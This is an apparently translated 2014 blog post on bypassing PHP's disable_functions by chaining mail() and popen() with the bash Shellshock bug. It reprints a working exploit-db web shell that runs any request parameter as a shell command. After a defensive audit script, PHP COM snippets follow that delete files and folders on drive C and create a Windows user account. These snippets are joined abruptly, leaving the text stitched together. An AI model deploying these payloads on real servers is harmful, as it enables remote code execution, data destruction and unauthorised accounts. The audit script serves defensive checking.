PHP Execute Command Bypass Disable_functions
2014-11-18 19:46
First, a short walkthrough of how PHP's mail() function runs sendmail.
Look at the source in ext/mail.c, line 236:

    char *sendmail_path = INI_STR("sendmail_path");
    char *sendmail_cmd = NULL;

The sendmail_path variable is read from the INI settings. Here is how php.ini describes it:

    ; For Unix only. You may supply arguments as well (default: "sendmail -t -i").
    ;sendmail_path =

As the comment shows, the default value of sendmail_path is "sendmail -t -i".

When extra_cmd (the extra arguments supplied by the caller) is present, spprintf() concatenates sendmail_path and extra_cmd into sendmail_cmd, the command line that is actually executed; otherwise sendmail_path is assigned to sendmail_cmd directly. The code:

    if (!sendmail_path) {
    #if (defined PHP_WIN32 || defined NETWARE)
        /* handle old style win smtp sending */
        if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
            if (tsm_errmsg) {
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
                efree(tsm_errmsg);
            } else {
                php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
            }
            MAIL_RET(0);
        }
        MAIL_RET(1);
    #else
        MAIL_RET(0);
    #endif
    }
    if (extra_cmd != NULL) {
        spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
    } else {
        sendmail_cmd = sendmail_path;
    }

Then it is executed:

    #ifdef PHP_WIN32
        sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
    #else
        /* Since popen() doesn't indicate if the internal fork() doesn't work
         * (e.g. the shell can't be executed) we explicitly set it to 0 to be
         * sure we don't catch any older errno value. */
        errno = 0;
        sendmail = popen(sendmail_cmd, "w");
    #endif
sendmail_cmd is handed to popen() for execution.

popen() runs the command through the system shell (/bin/sh). If the system's default sh is bash, the command is therefore handed to bash, and the earlier bash Shellshock bug (CVE-2014-6271) means the environment that mail() passes to that shell can carry a command of the caller's choosing. The result is arbitrary command execution through mail(), bypassing disable_functions.

Affected versions: all PHP versions

Fix: patch CVE-2014-6271

The PoC (http://www.exploit-db.com/exploits/35146/) is as follows:
    <?php
    # Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
    # Google Dork: none
    # Date: 10/31/2014
    # Exploit Author: Ryan King (Starfall)
    # Vendor Homepage: http://php.net
    # Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
    # Version: 5.* (tested on 5.6.2)
    # Tested on: Debian 7 and CentOS 5 and 6
    # CVE: CVE-2014-6271

    function shellshock($cmd) { // Execute a command via CVE-2014-6271 @mail.c:283
        $tmp = tempnam(".","data");
        putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
        // In Safe Mode, the user may only alter environment variables whose names
        // begin with the prefixes supplied by this directive.
        // By default, users will only be able to set environment variables that
        // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
        // PHP will let the user modify ANY environment variable!
        mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
        $output = @file_get_contents($tmp);
        @unlink($tmp);
        if($output != "") return $output; else return "No output, or not vuln.";
    }
    echo shellshock($_REQUEST["cmd"]);
    ?>
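To check the two conditions the post relies on from the defender's side, here is an added shell example; it is not from the original post, from exploit-db or from PHP itself. It runs the vendor-published Shellshock test string against the shell that popen() actually uses (the only thing that string does is echo a marker), resolves what /bin/sh points to, and audits a php.ini for whether putenv and mail are listed in disable_functions, since a script needs putenv() to plant the environment and mail() to reach the shell. The function names and the sample php.ini the script writes to a temp file are assumptions of this example.

```sh
#!/bin/sh
# Added example, not code from the original post. Audits a host for the
# preconditions described above: an unpatched bash behind /bin/sh and a
# php.ini that still exposes putenv()/mail(). Function names are assumed.

# Print "vulnerable" if the shell given as $1 imports a function definition
# from the environment the way unpatched bash did (CVE-2014-6271),
# otherwise "patched". The test value only echoes a marker string.
shellshock_status() {
    sh="$1"
    out=$(env SS_TEST='() { :;}; echo SS_MARKER' "$sh" -c 'echo probe' 2>/dev/null)
    case "$out" in
        *SS_MARKER*) echo vulnerable ;;
        *)           echo patched ;;
    esac
}

# Report which binary /bin/sh really is, because popen() always runs /bin/sh;
# on many distributions it is dash, on others a symlink to bash.
popen_shell() {
    readlink -f "${1:-/bin/sh}"
}

# Print "ok" if the php.ini given as $1 lists both putenv and mail in
# disable_functions; otherwise print "missing:" followed by the absent names.
ini_audit() {
    ini="$1"
    disabled=$(sed -n 's/^[[:space:]]*disable_functions[[:space:]]*=[[:space:]]*//p' "$ini" | tr -d ' ')
    missing=""
    for fn in putenv mail; do
        case ",$disabled," in
            *",$fn,"*) ;;
            *) missing="$missing $fn" ;;
        esac
    done
    if [ -z "$missing" ]; then echo ok; else echo "missing:$missing"; fi
}

# Write a constructed sample php.ini ("weak" or "hardened") to a temp file
# and print its path. The contents are made up for this example.
make_sample_ini() {
    f=$(mktemp)
    if [ "$1" = "hardened" ]; then
        printf '%s\n' '; constructed sample php.ini' \
            'disable_functions = exec,system,passthru,shell_exec,putenv,mail' > "$f"
    else
        printf '%s\n' '; constructed sample php.ini' \
            'disable_functions = exec,system,passthru,shell_exec' \
            ';sendmail_path =' > "$f"
    fi
    echo "$f"
}

# Stand-alone run: report on this host and on the constructed sample ini.
report() {
    echo "/bin/sh resolves to: $(popen_shell /bin/sh)"
    echo "Shellshock status of /bin/sh: $(shellshock_status /bin/sh)"
    ini=$(make_sample_ini weak)
    echo "disable_functions audit of sample ini: $(ini_audit "$ini")"
    rm -f "$ini"
}
report
```

If shellshock_status prints "vulnerable", patching bash is the real fix; the php.ini audit only closes the route a PHP script has into the environment of that shell, and a hardened disable_functions line should also be checked on a real server against every SAPI's loaded configuration, not just the file on disk.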
    <?php
    $mPath = str_repeat("..",20);
    $FSOdelFile = new COM('Scripting.FileSystemObject'); // uses wshom.ocx
    $FSOdelFile->DeleteFile($mPath.".*.dat", True); // delete every .dat file in the root of drive C
    ?>

DeleteFolder in wshom.ocx: this function can delete folders on the server, which is quite scary. Test code:

    <?php
    $mPath = str_repeat("..",20);
    $FSOdelFolder = new COM('Scripting.FileSystemObject'); // uses wshom.ocx
    $FSOdelFolder->DeleteFolder($mPath.".11", True); // delete a specific folder
    ?>

After requesting the page, the folder c:11 was successfully deleted.

Creating an account with the Create function in shgina.dll. Test code for this issue:

    <?php
    $user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}'); // uses shgina.dll
    $user->Create("asd"); // create the account asd
    ?>